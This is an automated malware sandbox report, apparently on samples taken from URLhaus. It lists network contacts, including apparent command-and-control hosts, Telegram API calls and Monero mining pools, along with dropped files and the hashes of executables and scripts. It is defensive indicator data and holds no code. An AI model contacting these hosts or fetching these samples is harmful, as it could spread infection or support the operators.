US 8.8.8.8:53 cdn-downloads.com udp
HK 156.245.12.57:8000 156.245.12.57 tcp
NL 203.161.45.11:443 cdn-downloads.com tcp
US 8.8.8.8:53 post-to-me.com udp
US 172.67.179.207:443 post-to-me.com tcp
RU 176.111.174.138:443 tcp
US 8.8.8.8:53 207.179.67.172.in-addr.arpa udp
NL 92.63.197.221:80 92.63.197.221 tcp
US 8.8.8.8:53 221.197.63.92.in-addr.arpa udp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 api.telegram.org udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 download.microsoft.com udp
GB 2.23.221.208:443 download.microsoft.com tcp
GB 2.23.221.208:443 download.microsoft.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 208.221.23.2.in-addr.arpa udp
DE 94.156.177.41:80 94.156.177.41 tcp
NL 82.168.179.78:1978 mohibkal.publicvm.com tcp
RU 176.111.174.138:443 tcp
DE 94.156.177.41:80 94.156.177.41 tcp
NL 81.161.238.172:8705 tcp
DE 94.156.177.41:80 94.156.177.41 tcp
RU 176.113.115.37:80 176.113.115.37 tcp
VN 14.243.221.170:2654 tcp
RU 176.111.174.138:443 tcp
HK 118.107.47.206:2088 118.107.47.206 tcp
US 8.8.8.8:53 206.47.107.118.in-addr.arpa udp
HK 103.87.10.156:50698 tcp
RU 176.111.174.138:443 tcp
US 147.185.221.22:12466 week-dictionary.gl.at.ply.gg tcp
RU 92.255.57.88:80 92.255.57.88 tcp
US 8.8.8.8:53 88.57.255.92.in-addr.arpa udp
RU 176.113.115.178:80 176.113.115.178 tcp
RU 176.111.174.138:443 tcp
RU 188.119.66.185:443 tcp
RU 176.113.115.178:80 176.113.115.178 tcp
KR 152.67.212.187:443 tcp
US 8.8.8.8:53 185.66.119.188.in-addr.arpa udp
US 8.8.8.8:53 233.38.18.104.in-addr.arpa udp
RU 176.111.174.138:443 tcp
US 8.8.8.8:53 23.149.64.172.in-addr.arpa udp
NL 82.168.179.78:1978 mohibkal.publicvm.com tcp
US 8.8.8.8:53 35.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 42.200.250.142.in-addr.arpa udp
RU 176.111.174.138:443 tcp
US 8.8.8.8:53 www.google.com udp
GB 172.217.16.228:443 www.google.com tcp
GB 172.217.16.228:443 www.google.com tcp
GB 172.217.16.228:443 www.google.com udp
US 8.8.8.8:53 228.16.217.172.in-addr.arpa udp
RU 92.255.57.88:80 92.255.57.88 tcp
NL 81.161.238.172:8705 tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
VN 14.243.221.170:2654 tcp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
RU 176.111.174.138:443 tcp
US 147.185.221.22:12466 week-dictionary.gl.at.ply.gg tcp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 104.208.16.94:443 nw-umwatson.events.data.microsoft.com tcp
US 8.8.8.8:53 spocs.getpocket.com udp
US 8.8.8.8:53 firefox-api-proxy.cdn.mozilla.net udp
US 34.149.97.1:443 firefox-api-proxy.cdn.mozilla.net tcp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 94.16.208.104.in-addr.arpa udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 34.149.97.1:443 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
RU 176.111.174.138:443 tcp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 83.106.226.44.in-addr.arpa udp
US 8.8.8.8:53 firefox-settings-attachments.cdn.mozilla.net udp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 nav.smartscreen.microsoft.com udp
GB 51.140.244.186:443 nav.smartscreen.microsoft.com tcp
GB 51.140.244.186:443 nav.smartscreen.microsoft.com tcp
RU 176.111.174.138:443 tcp
HK 103.68.192.104:80 taodianla.com tcp
NL 82.168.179.78:1978 mohibkal.publicvm.com tcp
RU 92.255.57.88:80 92.255.57.88 tcp
NL 92.63.197.221:80 92.63.197.221 tcp
RU 176.111.174.138:443 tcp
US 8.8.8.8:53 xmr-eu2.nanopool.org udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
NL 81.161.238.172:8705 tcp
VN 14.243.221.170:2654 tcp
FR 51.210.150.92:10343 xmr-eu2.nanopool.org tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
NL 92.63.197.221:80 92.63.197.221 tcp
RU 176.111.174.138:443 tcp
US 8.8.8.8:53 92.150.210.51.in-addr.arpa udp
US 147.185.221.22:12466 week-dictionary.gl.at.ply.gg tcp
RU 176.111.174.138:443 tcp
RU 176.111.174.138:443 tcp
KR 152.67.212.187:443 tcp
US 8.8.8.8:53 mohibkal.publicvm.com udp
VN 14.243.221.170:2654 tcp
NL 81.161.238.172:8705 tcp
RU 176.111.174.138:443 tcp
RU 176.111.174.138:443 tcp
NL 82.168.179.78:1978 mohibkal.publicvm.com tcp
RU 188.119.66.185:443 tcp
HK 103.87.10.156:50698 tcp
DE 94.156.177.41:80 94.156.177.41 tcp
RU 92.255.57.88:80 92.255.57.88 tcp
US 147.185.221.22:12466 week-dictionary.gl.at.ply.gg tcp
VN 14.243.221.170:2654 tcp
RU 176.111.174.138:443 tcp
NL 31.214.157.206:2024 tcp
NL 81.161.238.172:8705 tcp
RU 176.111.174.138:443 tcp
US 8.8.8.8:53 206.157.214.31.in-addr.arpa udp
NL 82.168.179.78:1978 mohibkal.publicvm.com tcp
RU 176.111.174.138:443 tcp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 201.181.244.35.in-addr.arpa udp
RU 92.255.57.88:80 92.255.57.88 tcp
RU 176.111.174.138:443 tcp
NL 92.63.197.221:80 92.63.197.221 tcp
RU 176.111.174.138:443 tcp
VN 14.243.221.170:2654 tcp
US 8.8.8.8:53 location.services.mozilla.com udp
US 35.190.72.216:443 location.services.mozilla.com tcp
US 8.8.8.8:53 prod.classify-client.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.classify-client.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 25.73.42.20.in-addr.arpa udp
US 8.8.8.8:53 ciscobinary.openh264.org udp
GB 88.221.134.155:80 ciscobinary.openh264.org tcp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
GB 172.217.169.46:443 redirector.gvt1.com tcp
GB 172.217.169.46:443 redirector.gvt1.com udp
US 8.8.8.8:53 r3---sn-4g5lzne6.gvt1.com udp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
DE 74.125.160.232:443 r3---sn-4g5lzne6.gvt1.com tcp
US 8.8.8.8:53 redirector.gvt1.com udp
US 8.8.8.8:53 r3.sn-4g5lzne6.gvt1.com udp
DE 74.125.160.232:443 r3.sn-4g5lzne6.gvt1.com udp
US 8.8.8.8:53 redirector.gvt1.com udp
US 8.8.8.8:53 r3.sn-4g5lzne6.gvt1.com udp
US 8.8.8.8:53 216.72.190.35.in-addr.arpa udp
US 8.8.8.8:53 155.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 46.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 232.160.125.74.in-addr.arpa udp
US 147.185.221.22:12466 week-dictionary.gl.at.ply.gg tcp
NL 81.161.238.172:8705 tcp
RU 176.111.174.138:443 tcp
NL 82.168.179.78:1978 mohibkal.publicvm.com tcp
US 154.216.20.237:80 154.216.20.237 tcp
RU 176.111.174.138:443 tcp
US 8.8.8.8:53 237.20.216.154.in-addr.arpa udp
US 8.8.8.8:53 filelu.com udp
US 104.26.12.42:443 filelu.com tcp
US 8.8.8.8:53 42.12.26.104.in-addr.arpa udp
US 8.8.8.8:53 3434.filelu.cloud udp
US 67.23.237.28:443 3434.filelu.cloud tcp
US 8.8.8.8:53 r11.o.lencr.org udp
GB 2.23.210.82:80 r11.o.lencr.org tcp
US 8.8.8.8:53 82.210.23.2.in-addr.arpa udp
RU 176.111.174.138:443 tcp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI24522\python311.dll

MD5 9a24c8c35e4ac4b1597124c1dcbebe0f
SHA1 f59782a4923a30118b97e01a7f8db69b92d8382a
SHA256 a0cf640e756875c25c12b4a38ba5f2772e8e512036e2ac59eb8567bf05ffbfb7
SHA512 9d9336bf1f0d3bc9ce4a636a5f4e52c5f9487f51f00614fc4a34854a315ce7ea8be328153812dbd67c45c75001818fa63317eba15a6c9a024fa9f2cab163165b

C:\Users\Admin\AppData\Local\Temp\_MEI24522\VCRUNTIME140.dll

MD5 f12681a472b9dd04a812e16096514974
SHA1 6fd102eb3e0b0e6eef08118d71f28702d1a9067c
SHA256 d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8
SHA512 7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2

C:\Users\Admin\AppData\Local\Temp\_MEI24522\base_library.zip

MD5 9836732a064983e8215e2e26e5b66974
SHA1 02e9a46f5a82fa5de6663299512ca7cd03777d65
SHA256 3dfe7d63f90833e0f3de22f450ed5ee29858bb12fe93b41628afe85657a3b61f
SHA512 1435ba9bc8d35a9336dee5db06944506953a1bcf340e9bdad834828170ce826dcfb1fa80274cd9df667e47b83348139b38ab317055a5a3e6824df15adf8a4d86

C:\Users\Admin\AppData\Local\Temp\_MEI24522\python3.DLL

MD5 34e49bb1dfddf6037f0001d9aefe7d61
SHA1 a25a39dca11cdc195c9ecd49e95657a3e4fe3215
SHA256 4055d1b9e553b78c244143ab6b48151604003b39a9bf54879dee9175455c1281
SHA512 edb715654baaf499cf788bcacd5657adcf9f20b37b02671abe71bda334629344415ed3a7e95cb51164e66a7aa3ed4bf84acb05649ccd55e3f64036f3178b7856

C:\Users\Admin\AppData\Local\Temp\_MEI24522\libffi-8.dll

MD5 32d36d2b0719db2b739af803c5e1c2f5
SHA1 023c4f1159a2a05420f68daf939b9ac2b04ab082
SHA256 128a583e821e52b595eb4b3dda17697d3ca456ee72945f7ecce48ededad0e93c
SHA512 a0a68cfc2f96cb1afd29db185c940e9838b6d097d2591b0a2e66830dd500e8b9538d170125a00ee8c22b8251181b73518b73de94beeedd421d3e888564a111c1

C:\Users\Admin\AppData\Local\Temp\_MEI24522\_socket.pyd

MD5 8140bdc5803a4893509f0e39b67158ce
SHA1 653cc1c82ba6240b0186623724aec3287e9bc232
SHA256 39715ef8d043354f0ab15f62878530a38518fb6192bc48da6a098498e8d35769
SHA512 d0878fee92e555b15e9f01ce39cfdc3d6122b41ce00ec3a4a7f0f661619f83ec520dca41e35a1e15650fb34ad238974fe8019577c42ca460dde76e3891b0e826

C:\Users\Admin\AppData\Local\Temp\_MEI24522\select.pyd

MD5 97ee623f1217a7b4b7de5769b7b665d6
SHA1 95b918f3f4c057fb9c878c8cc5e502c0bd9e54c0
SHA256 0046eb32f873cde62cf29af02687b1dd43154e9fd10e0aa3d8353d3debb38790
SHA512 20edc7eae5c0709af5c792f04a8a633d416da5a38fc69bd0409afe40b7fb1afa526de6fe25d8543ece9ea44fd6baa04a9d316ac71212ae9638bdef768e661e0f

C:\Users\Admin\AppData\Local\Temp\_MEI24522\_lzma.pyd

MD5 337b0e65a856568778e25660f77bc80a
SHA1 4d9e921feaee5fa70181eba99054ffa7b6c9bb3f
SHA256 613de58e4a9a80eff8f8bc45c350a6eaebf89f85ffd2d7e3b0b266bf0888a60a
SHA512 19e6da02d9d25ccef06c843b9f429e6b598667270631febe99a0d12fc12d5da4fb242973a8351d3bf169f60d2e17fe821ad692038c793ce69dfb66a42211398e

C:\Users\Admin\AppData\Local\Temp\_MEI24522\setuptools\_vendor\jaraco\text\Lorem ipsum.txt

MD5 4ce7501f6608f6ce4011d627979e1ae4
SHA1 78363672264d9cd3f72d5c1d3665e1657b1a5071
SHA256 37fedcffbf73c4eb9f058f47677cb33203a436ff9390e4d38a8e01c9dad28e0b
SHA512 a4cdf92725e1d740758da4dd28df5d1131f70cef46946b173fe6956cc0341f019d7c4fecc3c9605f354e1308858721dada825b4c19f59c5ad1ce01ab84c46b24

C:\Users\Admin\AppData\Local\Temp\_MEI24522\_brotli.cp311-win_amd64.pyd

MD5 d9fc15caf72e5d7f9a09b675e309f71d
SHA1 cd2b2465c04c713bc58d1c5de5f8a2e13f900234
SHA256 1fcd75b03673904d9471ec03c0ef26978d25135a2026020e679174bdef976dcf
SHA512 84f705d52bd3e50ac412c8de4086c18100eac33e716954fbcb3519f4225be1f4e1c3643d5a777c76f7112fae30ce428e0ce4c05180a52842dacb1f5514460006

C:\Users\Admin\AppData\Local\Temp\_MEI24522\certifi\cacert.pem

MD5 50ea156b773e8803f6c1fe712f746cba
SHA1 2c68212e96605210eddf740291862bdf59398aef
SHA256 94edeb66e91774fcae93a05650914e29096259a5c7e871a1f65d461ab5201b47
SHA512 01ed2e7177a99e6cb3fbef815321b6fa036ad14a3f93499f2cb5b0dae5b713fd2e6955aa05f6bda11d80e9e0275040005e5b7d616959b28efc62abb43a3238f0

C:\Users\Admin\AppData\Local\Temp\_MEI24522\multidict\_multidict.cp311-win_amd64.pyd

MD5 ecc0b2fcda0485900f4b72b378fe4303
SHA1 40d9571b8927c44af39f9d2af8821f073520e65a
SHA256 bcbb43ce216e38361cb108e99bab86ae2c0f8930c86d12cadfca703e26003cb1
SHA512 24fd07eb0149cb8587200c055f20ff8c260b8e626693c180cba4e066194bed7e8721dde758b583c93f7cb3d691b50de6179ba86821414315c17b3d084d290e70

C:\Users\Admin\AppData\Local\Temp\_MEI24522\_uuid.pyd

MD5 9a4957bdc2a783ed4ba681cba2c99c5c
SHA1 f73d33677f5c61deb8a736e8dde14e1924e0b0dc
SHA256 f7f57807c15c21c5aa9818edf3993d0b94aef8af5808e1ad86a98637fc499d44
SHA512 027bdcb5b3e0ca911ee3c94c42da7309ea381b4c8ec27cf9a04090fff871db3cf9b7b659fdbcfff8887a058cb9b092b92d7d11f4f934a53be81c29ef8895ac2b

C:\Users\Admin\AppData\Local\Temp\_MEI24522\propcache\_helpers_c.cp311-win_amd64.pyd

MD5 04444380b89fb22b57e6a72b3ae42048
SHA1 cfe9c662cb5ca1704e3f0763d02e0d59c5817d77
SHA256 d123d7fefde551c82eb61454d763177322e5ce1eaa65dc489e19de5ab7faf7b4
SHA512 9e7d367bab0f6cc880c5870fdcdb06d9a9e5eb24eba489ca85549947879b0fa3c586779ffcea0fca4c50aa67dad098e7bd9e82c00e2d00412d9441991267d2da

C:\Users\Admin\AppData\Local\Temp\_MEI24522\yarl\_quoting_c.cp311-win_amd64.pyd

MD5 1c6c610e5e2547981a2f14f240accf20
SHA1 4a2438293d2f86761ef84cfdf99a6ca86604d0b8
SHA256 4a982ff53e006b462ddf7090749bc06ebb6e97578be04169489d27e93f1d1804
SHA512 f6ea205a49bf586d7f3537d56b805d34584a4c2c7d75a81c53ce457a4a438590f6dbeded324362bfe18b86ff5696673de5fbe4c9759ad121b5e4c9ae2ef267c0

C:\Users\Admin\AppData\Local\Temp\_MEI24522\_overlapped.pyd

MD5 01ad7ca8bc27f92355fd2895fc474157
SHA1 15948cd5a601907ff773d0b48e493adf0d38a1a6
SHA256 a083e83f609ed7a2fc18a95d44d8f91c9dc74842f33e19e91988e84db94c3b5b
SHA512 8fe6ac8430f8dde45c74f45575365753042642dc9fa9defbcf25ae1832baf6abb1ea1ad6d087e4ece5d0590e36cee1beea99845aef6182c1eec4bafdf9557604

C:\Users\Admin\AppData\Local\Temp\_MEI24522\_asyncio.pyd

MD5 2859c39887921dad2ff41feda44fe174
SHA1 fae62faf96223ce7a3e6f7389a9b14b890c24789
SHA256 aebc378db08617ea81a0a3a3bc044bcc7e6303e314630392dd51bab12f879bd9
SHA512 790be0c95c81eb6d410e53fe8018e2ca5efd1838dc60539ebb011911c36c8478333ee95989cfd1ddaf4f892b537ae8305eb4cd893906930deae59c8965cf2fbb

C:\Users\Admin\AppData\Local\Temp\_MEI24522\unicodedata.pyd

MD5 bc58eb17a9c2e48e97a12174818d969d
SHA1 11949ebc05d24ab39d86193b6b6fcff3e4733cfd
SHA256 ecf7836aa0d36b5880eb6f799ec402b1f2e999f78bfff6fb9a942d1d8d0b9baa
SHA512 4aa2b2ce3eb47503b48f6a888162a527834a6c04d3b49c562983b4d5aad9b7363d57aef2e17fe6412b89a9a3b37fb62a4ade4afc90016e2759638a17b1deae6c

C:\Users\Admin\AppData\Local\Temp\_MEI24522\charset_normalizer\md__mypyc.cp311-win_amd64.pyd

MD5 bac273806f46cffb94a84d7b4ced6027
SHA1 773fbc0435196c8123ee89b0a2fc4d44241ff063
SHA256 1d9aba3ff1156ea1fbe10b8aa201d4565ae6022daf2117390d1d8197b80bb70b
SHA512 eaec1f072c2c0bc439ac7b4e3aea6e75c07bd4cd2d653be8500bbffe371fbfe045227daead653c162d972ccaadff18ac7da4d366d1200618b0291d76e18b125c

C:\Users\Admin\AppData\Local\Temp\_MEI24522\charset_normalizer\md.cp311-win_amd64.pyd

MD5 cbf62e25e6e036d3ab1946dbaff114c1
SHA1 b35f91eaf4627311b56707ef12e05d6d435a4248
SHA256 06032e64e1561251ea3035112785f43945b1e959a9bf586c35c9ea1c59585c37
SHA512 04b694d0ae99d5786fa19f03c5b4dd8124c4f9144cfe7ca250b48a3c0de0883e06a6319351ae93ea95b55bbbfa69525a91e9407478e40ad62951f1d63d45ff18

C:\Users\Admin\AppData\Local\Temp\_MEI24522\pyexpat.pyd

MD5 1c0a578249b658f5dcd4b539eea9a329
SHA1 efe6fa11a09dedac8964735f87877ba477bec341
SHA256 d97f3e27130c267e7d3287d1b159f65559e84ead9090d02a01b4c7dc663cd509
SHA512 7b21dcd7b64eeba13ba8a618960190d1a272fa4805dedcf8f9e1168aebfe890b0ced991435ecbd353467a046fc0e8307f9a9be1021742d7d93aa124c52cc49e6

C:\Users\Admin\AppData\Local\Temp\_MEI24522\libssl-1_1.dll

MD5 8769adafca3a6fc6ef26f01fd31afa84
SHA1 38baef74bdd2e941ccd321f91bfd49dacc6a3cb6
SHA256 2aebb73530d21a2273692a5a3d57235b770daf1c35f60c74e01754a5dac05071
SHA512 fac22f1a2ffbfb4789bdeed476c8daf42547d40efe3e11b41fadbc4445bb7ca77675a31b5337df55fdeb4d2739e0fb2cbcac2feabfd4cd48201f8ae50a9bd90b

C:\Users\Admin\AppData\Local\Temp\_MEI24522\_ssl.pyd

MD5 069bccc9f31f57616e88c92650589bdd
SHA1 050fc5ccd92af4fbb3047be40202d062f9958e57
SHA256 cb42e8598e3fa53eeebf63f2af1730b9ec64614bda276ab2cd1f1c196b3d7e32
SHA512 0e5513fbe42987c658dba13da737c547ff0b8006aecf538c2f5cf731c54de83e26889be62e5c8a10d2c91d5ada4d64015b640dab13130039a5a8a5ab33a723dc

C:\Users\Admin\AppData\Local\Temp\_MEI24522\libcrypto-1_1.dll

MD5 6f4b8eb45a965372156086201207c81f
SHA1 8278f9539463f0a45009287f0516098cb7a15406
SHA256 976ce72efd0a8aeeb6e21ad441aa9138434314ea07f777432205947cdb149541
SHA512 2c5c54842aba9c82fb9e7594ae9e264ac3cbdc2cc1cd22263e9d77479b93636799d0f28235ac79937070e40b04a097c3ea3b7e0cd4376a95ed8ca90245b7891f

C:\Users\Admin\AppData\Local\Temp\_MEI24522\_hashlib.pyd

MD5 de4d104ea13b70c093b07219d2eff6cb
SHA1 83daf591c049f977879e5114c5fea9bbbfa0ad7b
SHA256 39bc615842a176db72d4e0558f3cdcae23ab0623ad132f815d21dcfbfd4b110e
SHA512 567f703c2e45f13c6107d767597dba762dc5caa86024c87e7b28df2d6c77cd06d3f1f97eed45e6ef127d5346679fea89ac4dc2c453ce366b6233c0fa68d82692

C:\Users\Admin\AppData\Local\Temp\_MEI24522\_queue.pyd

MD5 ff8300999335c939fcce94f2e7f039c0
SHA1 4ff3a7a9d9ca005b5659b55d8cd064d2eb708b1a
SHA256 2f71046891ba279b00b70eb031fe90b379dbe84559cf49ce5d1297ea6bf47a78
SHA512 f29b1fd6f52130d69c8bd21a72a71841bf67d54b216febcd4e526e81b499b9b48831bb7cdff0bff6878aab542ca05d6326b8a293f2fb4dd95058461c0fd14017

C:\Users\Admin\AppData\Local\Temp\_MEI24522\_bz2.pyd

MD5 4101128e19134a4733028cfaafc2f3bb
SHA1 66c18b0406201c3cfbba6e239ab9ee3dbb3be07d
SHA256 5843872d5e2b08f138a71fe9ba94813afee59c8b48166d4a8eb0f606107a7e80
SHA512 4f2fc415026d7fd71c5018bc2ffdf37a5b835a417b9e5017261849e36d65375715bae148ce8f9649f9d807a63ac09d0fb270e4abae83dfa371d129953a5422ca

C:\Users\Admin\AppData\Local\Temp\_MEI24522\_multiprocessing.pyd

MD5 1386dbc6dcc5e0be6fef05722ae572ec
SHA1 470f2715fafd5cafa79e8f3b0a5434a6da78a1ba
SHA256 0ae3bf383ff998886f97576c55d6bf0a076c24395cf6fcd2265316e9a6e8c007
SHA512 ca6e5c33273f460c951cb8ec1d74ce61c0025e2ead6d517c18a6b0365341a0fd334e8976006cd62b72eb5620ccc42cfdd5196e8b10691b8f19f69f851a440293

C:\Users\Admin\AppData\Local\Temp\_MEI24522\_decimal.pyd

MD5 d47e6acf09ead5774d5b471ab3ab96ff
SHA1 64ce9b5d5f07395935df95d4a0f06760319224a2
SHA256 d0df57988a74acd50b2d261e8b5f2c25da7b940ec2aafbee444c277552421e6e
SHA512 52e132ce94f21fa253fed4cf1f67e8d4423d8c30224f961296ee9f64e2c9f4f7064d4c8405cd3bb67d3cf880fe4c21ab202fa8cf677e3b4dad1be6929dbda4e2

C:\Users\Admin\AppData\Local\Temp\_MEI24522\_cffi_backend.cp311-win_amd64.pyd

MD5 739d352bd982ed3957d376a9237c9248
SHA1 961cf42f0c1bb9d29d2f1985f68250de9d83894d
SHA256 9aee90cf7980c8ff694bb3ffe06c71f87eb6a613033f73e3174a732648d39980
SHA512 585a5143519ed9b38bb53f912cea60c87f7ce8ba159a1011cf666f390c2e3cc149e0ac601b008e039a0a78eaf876d7a3f64fff612f5de04c822c6e214bc2efde

C:\Users\Admin\AppData\Local\Temp\_MEI24522\_ctypes.pyd

MD5 6a9ca97c039d9bbb7abf40b53c851198
SHA1 01bcbd134a76ccd4f3badb5f4056abedcff60734
SHA256 e662d2b35bb48c5f3432bde79c0d20313238af800968ba0faa6ea7e7e5ef4535
SHA512 dedf7f98afc0a94a248f12e4c4ca01b412da45b926da3f9c4cbc1d2cbb98c8899f43f5884b1bf1f0b941edaeef65612ea17438e67745962ff13761300910960d

C:\Users\Admin\Downloads\UrlHausFiles\payload1.bat

MD5 c5fb4d9422b14a3a05ec89582eeb3758
SHA1 be0c09399ed4f66781661ff8d434738f0dc9c95d
SHA256 07dcc4cf3f9f7fc5a74a1539e385ff54fc840c9cd0c8bc2008e54d01070e066b
SHA512 dc79503691d44a65b6503e2b5bced29eba5c3069ac1ff07c5478a5ad4597f4baf62490eebe036e975fc542b0010d78d2a78c26a48ac648f9452337047c0bdf6b

C:\Users\Admin\Downloads\UrlHausFiles\TTqmYJg.exe

MD5 e3eb0a1df437f3f97a64aca5952c8ea0
SHA1 7dd71afcfb14e105e80b0c0d7fce370a28a41f0a
SHA256 38ffd4972ae513a0c79a8be4573403edcd709f0f572105362b08ff50cf6de521
SHA512 43573b0cbaac6e2e1646e6217d2d10c40ad10b9db1f4492d6740545e793c891b5e39283a082896c0392b88eb319dfa9392421b1c89c094c9ce9f31b53d37ebaf

C:\Users\Admin\Downloads\UrlHausFiles\PowerShell.exe

MD5 df4465e6693e489c6db32a427bbd93ec
SHA1 ea8ef0ae2b517e10f934b66ebefa71e2d9007aa5
SHA256 0c5031bae18c7e5b294b89b4b82e30c3862d1e5e4aa5fd664d7a04451dc83847
SHA512 4d569c1c29adadf32ff28ba53378493189c99e6e1734e1c896e52e6df89358cbfc6525a96ae1d5cbd99a909ffb7d8e88b075674f679a448a54fef961cdc16f5d

memory/2636-152-0x00007FFD25F13000-0x00007FFD25F15000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe

MD5 2697c90051b724a80526c5b8b47e5df4
SHA1 749d44fe2640504f15e9bf7b697f1017c8c2637d
SHA256 f8b23a264f58e9001e087af2bf48eed5938db31b5b1b20d973575cfa6a121355
SHA512 d0c8d76699f2f88d76eeaf211e59a780969b7692b513495a34013af8380d3fe0616caf03c6e47b8e7721d2f0a369c1dd20860b755b7d607783a99080c5f5315b

memory/2636-153-0x00000000006D0000-0x00000000006DE000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\26.ps1

MD5 6c7bb2eade7ae01218c2e33fc7d30d1f
SHA1 1b089598277fec6a2b2026354add723930feafba
SHA256 d831a7e21ea3c1bcb7ab4b5a21f01dd20b04e1999eb934e17ac50bcdfbcef68c
SHA512 709d364045dbacab00d0da4916b9752253af275e1532309f869afe7ad4e11984c3ed10de46cf08b999ffbb9d677f08d3cfc419fc2a731933c333b43177e5e1bd

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gngco52x.lur.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4760-174-0x000001F1E8B90000-0x000001F1E8BB2000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\a.exe

MD5 ff370f449a6e83018df4b4163380fc57
SHA1 012c030503055803fd192c60dcc9e4733f917025
SHA256 1aa867bb4fb60de654e5e166c0a0e45c3b131a0131484c6b8888fea501c37b3a
SHA512 b0b41d5b391f6cfd582830abe132b87dc9434768c78dca90b3b8aaffe40880f6bb07a120b60cd4832e72202ea7c8257f4ec20d0b152136f6fc1ceb0a2b23ad7e

C:\Users\Admin\Downloads\UrlHausFiles\HRFuUub.exe

MD5 98da391545b4823ca67e6cc3a927dae9
SHA1 d2f66837884d6d65dfe21372501cc7ba1d91ef29
SHA256 12862b60140f019b0c251da7be59caf90d93eca6a30d016609cf2ff1da4652a7
SHA512 59130547c169768310d57c075f2cec01a71704e9658955ef8eb1c6b2c30a24a801623f189eac14a84357aa597f5d5c96c5c9f8e96ee4ddf7bcf911dcf6bcb7b9

C:\Users\Admin\Downloads\UrlHausFiles\dmshell.exe

MD5 a62abdeb777a8c23ca724e7a2af2dbaa
SHA1 8b55695b49cb6662d9e75d91a4c1dc790660343b
SHA256 84bde93f884b8308546980eb551da6d2b8bc8d4b8f163469a39ccfd2f9374049
SHA512 ac04947446c4cb81bb61d9326d17249bca144b8af1ecdf1ac85b960c603e333b67ab08791e0501aee08939f54e517e6574895b1e49a588011008f8f060731169

memory/3196-212-0x0000000140000000-0x0000000140004248-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\AV.scr

MD5 3a0115a4eaaf7036d0d0f668d0aa2a7a
SHA1 1cc9a972c90d2532419fa2d1133f201711a3e8f0
SHA256 996644ae4d20599424239915a08f773260946cb3e238ea31e049bc45c3abaabb
SHA512 770d348082c831634749a7053b2a765a76cdf9a6b98d899ff6bc04edbc839c29b0c3bc77cb2b2f837bc63cf4761063db969914a882e988aa5e6b224d58faaddc

C:\Users\Admin\Downloads\UrlHausFiles\1_encoded.exe

MD5 6c098287139a5808d04237dd4cdaec3f
SHA1 aea943805649919983177a66d3d28a5e964da027
SHA256 53932083665adaf933f3d524e1d8399ee4530e03b53d0d39fcbc227041e6a787
SHA512 a9430d0661271f5f988aa14165b945faf4120cc7ed4f751e8f2f4498a7d7c74f03652f45c35035027e112976206054af831d5bd8909377b3947a8a87950afa47

memory/100-229-0x0000000000850000-0x0000000000890000-memory.dmp

memory/4548-228-0x0000000140000000-0x00000001400042C8-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\Photo.scr

MD5 471a1ad342659289433e05a611d206f8
SHA1 5b8aa4a6c5b5cda7043bfa621e07d5c3f8a3ae4c
SHA256 1a7e70bdb08512e8598168a2a37164661c9cc01a881fe2c7cf382f7edf842714
SHA512 def1d5d2b2b5715b39fc0080a5b5248e54b39ead8310bf6a588590d47a900cc7ca52945c8892a9ae6c336bc2894dc39c74a8964a2101f823d69691ff97f2de86

memory/100-240-0x0000000000DE0000-0x0000000000DE6000-memory.dmp

